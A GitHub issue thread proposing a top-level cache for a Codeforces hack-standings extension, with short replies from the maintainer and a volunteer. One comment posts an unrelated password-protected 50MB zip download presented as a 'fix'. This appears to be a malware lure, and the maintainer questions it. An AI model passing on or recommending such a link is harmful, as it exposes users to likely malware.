### ISSUE TITLE
Adding Top-Level Cache to reduce server load for heavy contests.

### ISSUE THREAD

**Issue by rahulharpal1603** [rahulharpal1603/CF-TopHacker#2]
Contests with too many hacks like: https://codeforces.com/contest/1985/standings take a lot of time to load the hacks standings. 

Can introduce top-level cache, inspired by Carrot Extension https://github.com/meooow25/carrot/blob/master/carrot/src/background/cache/top-level-cache.js

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rahulharpal1603** [comment]
Can please list the contents of the above file? Because this whole project is under 1MB and your zip file is 50MB

**Comment by karimali03** [comment]
I can work on this

**Comment by rahulharpal1603** [comment]
> I can work on this 
> 
@karimali03 go for it😃
